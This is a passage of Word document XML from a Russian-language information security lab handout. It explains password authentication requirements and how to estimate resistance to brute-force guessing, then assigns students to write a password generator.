        <w:t>Парольные системы идентификации/аутентификации является одними из основных и наиболее распространенных в СЗИ методами пользовательской аутентификации. В данном случае, информацией, аутентифицирующей пользователя, является некоторый секретный пароль, известный только легальному пользователю.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Парольная аутентификация пользователя является, как правило, передним краем обороны СЗИ. В связи с этим, модуль аутентификации по паролю наиболее часто подвергается атакам со стороны злоумышленника. Цель злоумышленника в данном случае – подобрать аутентифицирующую информацию (пароль) легального пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Методы парольной аутентификации пользователя являются наиболее простыми методами аутентификации и при несоблюдении определенных требований к выбору пароля являются достаточно уязвимыми.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Основными минимальными требованиями к выбору пароля и к подсистеме парольной аутентификации пользователя являются следующие.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>К паролю.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Минимальная длина пароля должна быть не менее 6 символов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Пароль должен состоять из различных групп символов (малые и большие латинские буквы, цифры, специальные символы ‘(’, ‘)’, ‘#’ и т.д.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>В качестве пароля не должны использоваться реальные слова, имена, фамилии и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>К подсистеме парольной аутентификации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1. Администратор СЗИ должен устанавливать максимальный срок действия пароля, после чего, он должен быть сменен.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>В подсистеме парольной аутентификации должно быть установлено ограничение числа попыток ввода пароля (как правило, не более 3).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>В подсистеме парольной аутентификации должна быть установлена временная задержка при вводе неправильного пароля.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Как правило, для генерирования паролей в СЗИ, удовлетворяющих перечисленным требованиям к паролям, используются программы - автоматические генераторы паролей пользователей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>При выполнении перечисленных требований к паролям и к подсистеме парольной аутентификации, единственно возможным методом взлома данной подсистемы злоумышленником является прямой перебор паролей (brute forcing).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Методика и порядок выполнения работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Количественная оценка стойкости парольной защиты</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Пусть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – мощность алфавита паролей (количество символов, которые могут быть использованы при составлении пароля. Например, если пароль состоит только из малых английских букв, то A=26).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – длина пароля.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="457200" cy="198120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37" name="Рисунок 37" descr="Y:\4_complate\бакалавры\+Информационная безопасность(Люля)\course\resources\CoursePreview\lab.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4_complate\бакалавры\+Информационная безопасность(Люля)\course\resources\CoursePreview\lab.files\image059.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:link="rId99">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t>- число всевозможных паролей длины L, которые можно составить из символов алфавита A.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – скорость перебора паролей злоумышленником.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – максимальный срок действия пароля.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Тогда, вероятность </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> подбора пароля злоумышленником в течении срока его действия </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> определяется по следующей формуле.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Эту формулу можно использовать в обратную сторону для решения следующей задачи:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ЗАДАЧА</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Определить минимальные мощность алфавита паролей </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и длину паролей </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, обеспечивающих вероятность подбора пароля злоумышленником не более заданной </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, при скорости подбора паролей </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, максимальном сроке действия пароля </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Данная задача имеет неоднозначное решение. При исходных данных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>V,T,P</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> однозначно можно определить лишь нижнюю границу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>S*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> числа всевозможных паролей. Целочисленное значение нижней границы вычисляется по формуле</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t> (1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>где - целая часть числа, взятая с округлением вверх.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После нахождения нижней границы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>S*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> необходимо выбрать такие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3AE2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для формирования </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>S=AL</w:t>
      </w:r>
      <w:r>
        <w:t>, чтобы выполнялось неравенство (2).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t> (2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">При выборе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, удовлетворяющего неравенству (2), вероятность подбора пароля злоумышленника (при заданных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) будет меньше, чем заданная </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>P.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Необходимо отметить, что при осуществлении вычислений по формулам (1) и (2), величины должны быть приведены к одним размерностям.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Пример</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Исходные данные – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=10-6, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=7 дней = 1 неделя, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t>=10 паролей / минуту = 10*60*24*7=100800 паролей в неделю.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Тогда,.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Условию удовлетворяют, например, такие комбинации </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=26, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=8 (пароль состоит из 8 малых символов английского алфавита), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=36, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=6 (пароль состоит из 6 символов, среди которых </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>могут быть малые латинские буквы и произвольные цифры).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Задание на лабораторную работу</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. В таблице 1 найти для вашего варианта значения характеристик </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>P,V,T</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Вычислить по формуле (1) нижнюю границу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>S*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для заданных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>P,V,T</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.Выбрать некоторый алфавит с мощностью </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и получить минимальную длину пароля </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>, при котором выполняется условие (2).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Реализовать программу – генератор паролей пользователей. Программа должна формировать случайную последовательность символов длины </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, при этом должен использоваться алфавит из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> символов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Оформить в тетради отчет по лабораторной работе согласно примеру, приведенному на последней странице.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Замечания:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>При реализации программы могут быть полезны следующие функции</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">RANDOM(N) – возвращает случайное число </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
